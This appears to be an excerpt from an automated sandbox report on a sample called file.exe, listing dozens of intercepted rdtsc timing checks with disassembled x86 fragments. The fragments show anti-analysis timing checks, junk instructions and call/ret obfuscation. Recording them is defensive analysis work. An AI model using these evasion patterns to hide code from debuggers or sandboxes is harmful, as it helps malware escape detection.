Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D0DD7 second address: 7D0DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D0DDB second address: 7D0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D4B96 second address: 7D4B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D4B9A second address: 7D4BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a cld 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F76A53AB968h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1EA5h], edi 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D2964h] 0x00000035 xchg eax, esi 0x00000036 jg 00007F76A53AB970h 0x0000003c push eax 0x0000003d pushad 0x0000003e jc 00007F76A53AB96Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5CD3 second address: 7D5CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76A4C44F46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7DE74F second address: 7DE753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7DE753 second address: 7DE792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F4Ch 0x00000007 jmp 00007F76A4C44F57h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F76A4C44F55h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7DE792 second address: 7DE798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7DE8D1 second address: 7DE91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76A4C44F4Fh 0x0000000b popad 0x0000000c jmp 00007F76A4C44F4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F76A4C44F58h 0x00000019 jmp 00007F76A4C44F4Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E54BA second address: 7E54CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E54CB second address: 7E54E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E54E7 second address: 7E5506 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A53AB971h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E5506 second address: 7E550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E550A second address: 7E5514 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E5669 second address: 7E569B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F76A4C44F4Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F76A4C44F59h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E569B second address: 7E56B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53AB96Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F76A53AB966h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E56B7 second address: 7E56BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E56BB second address: 7E56CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F76A4C93C16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E5824 second address: 611A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3AD6B824h 0x00000010 pushad 0x00000011 jnp 00007F76A540C8D9h 0x00000017 movzx eax, bx 0x0000001a and dx, 720Bh 0x0000001f popad 0x00000020 push dword ptr [ebp+122D03B5h] 0x00000026 jmp 00007F76A540C8E4h 0x0000002b call dword ptr [ebp+122D36CCh] 0x00000031 pushad 0x00000032 ja 00007F76A540C8ECh 0x00000038 xor eax, eax 0x0000003a mov dword ptr [ebp+122D23A0h], ebx 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 cld 0x00000045 mov dword ptr [ebp+122D2CC0h], eax 0x0000004b pushad 0x0000004c jmp 00007F76A540C8E2h 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1FBEh], ecx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 mov dword ptr [ebp+122D1EA0h], eax 0x00000067 jnc 00007F76A540C8E1h 0x0000006d lodsw 0x0000006f clc 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 cld 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 pushad 0x0000007a mov esi, 33349F84h 0x0000007f xor dword ptr [ebp+122D1EA0h], edx 0x00000085 popad 0x00000086 push eax 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9606 second address: 7E9622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9622 second address: 7E962D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76A540C8D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E962D second address: 7E9656 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76A4C93C21h 0x00000008 pushad 0x00000009 jmp 00007F76A4C93C23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E97AB second address: 7E97B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E97B1 second address: 7E97BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E97BA second address: 7E97D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jc 00007F76A540C902h 0x0000000f ja 00007F76A540C8ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E97D1 second address: 7E97EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C20h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F76A4C93C16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9AA3 second address: 7E9AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9AA7 second address: 7E9AB1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76A4C93C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9C03 second address: 7E9C2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A540C8D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76A540C8E1h 0x00000015 jnl 00007F76A540C8D6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9C2A second address: 7E9C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9C2E second address: 7E9C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9D82 second address: 7E9D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E9D88 second address: 7E9D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F03E8 second address: 7F03F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76A4C93C16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F03F4 second address: 7F03FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F03FC second address: 7F0409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F76A4C93C22h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F0409 second address: 7F041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76A540C8D6h 0x0000000a popad 0x0000000b jng 00007F76A540C8EFh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F4FB8 second address: 7F4FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F4FBC second address: 7F4FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F4568 second address: 7F456C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F456C second address: 7F4586 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F76A540C8E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F4586 second address: 7F4590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F5265 second address: 7F5272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F76A540C8D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F5272 second address: 7F5278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F5278 second address: 7F527C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F527C second address: 7F5282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F5282 second address: 7F528E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FBA48 second address: 7FBA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F76A4C93C1Ch 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FA8D0 second address: 7FA8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FA8D6 second address: 7FA8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FA8DE second address: 7FA915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F76A540C8D6h 0x0000000a pop edx 0x0000000b jns 00007F76A540C8EEh 0x00000011 jo 00007F76A540C8E2h 0x00000017 jne 00007F76A540C8D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BA02B second address: 7BA088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D1EAEh], edi 0x0000000f mov ecx, dword ptr [ebp+122D2AC0h] 0x00000015 lea eax, dword ptr [ebp+1247BE47h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F76A4C93C18h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 jc 00007F76A4C93C1Ch 0x0000003b mov dword ptr [ebp+122D1D5Eh], edx 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F76A4C93C22h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BA088 second address: 7BA08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BA08C second address: 7BA09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F76A4C93C16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BA8E4 second address: 7BA95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F76A540C8E3h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jnl 00007F76A540C8E7h 0x00000016 xchg eax, esi 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F76A540C8D8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D17E8h] 0x00000037 mov edx, dword ptr [ebp+122D2CC8h] 0x0000003d nop 0x0000003e jmp 00007F76A540C8E1h 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB0B5 second address: 7BB107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F76A4C93C18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 add ecx, dword ptr [ebp+122D392Ch] 0x0000002a push 0000001Eh 0x0000002c mov dword ptr [ebp+124466B4h], edi 0x00000032 nop 0x00000033 pushad 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB25B second address: 7BB288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76A540C8E0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F76A540C8E1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB288 second address: 7BB28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB28C second address: 7BB295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB295 second address: 7BB29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB446 second address: 7BB4AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F76A540C8E2h 0x00000010 nop 0x00000011 add dword ptr [ebp+122D305Ah], ecx 0x00000017 lea eax, dword ptr [ebp+1247BE8Bh] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F76A540C8D8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F76A540C8E7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FAEE1 second address: 7FAEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FAEEA second address: 7FAEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F76A540C8D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FAEF4 second address: 7FAF04 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76A4C93C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FAF04 second address: 7FAF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FAF0A second address: 7FAF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FB35F second address: 7FB363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FB363 second address: 7FB39A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76A4C93C16h 0x00000008 jg 00007F76A4C93C16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F76A4C93C29h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F76A4C93C16h 0x0000001d jnp 00007F76A4C93C16h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FFF8B second address: 7FFF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 800378 second address: 8003A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a jng 00007F76A4C93C16h 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F76A4C93C29h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8004E9 second address: 800506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A540C8E0h 0x00000009 push ebx 0x0000000a je 00007F76A540C8D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8007BA second address: 8007BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8007BE second address: 8007DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76A540C8DAh 0x0000000b jmp 00007F76A540C8DAh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8007DB second address: 8007E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 800941 second address: 800955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76A540C8DEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 800C27 second address: 800C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C1Ch 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F76A4C93C16h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 800C42 second address: 800C47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 803EDA second address: 803EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jg 00007F76A4C93C16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 803EEA second address: 803EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 803EEF second address: 803F07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A4C93C1Eh 0x00000008 jo 00007F76A4C93C1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8041A8 second address: 8041AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8041AC second address: 8041B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8041B1 second address: 8041F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F76A540C8E7h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jbe 00007F76A540C8F4h 0x00000014 jmp 00007F76A540C8E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8041F0 second address: 8041FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
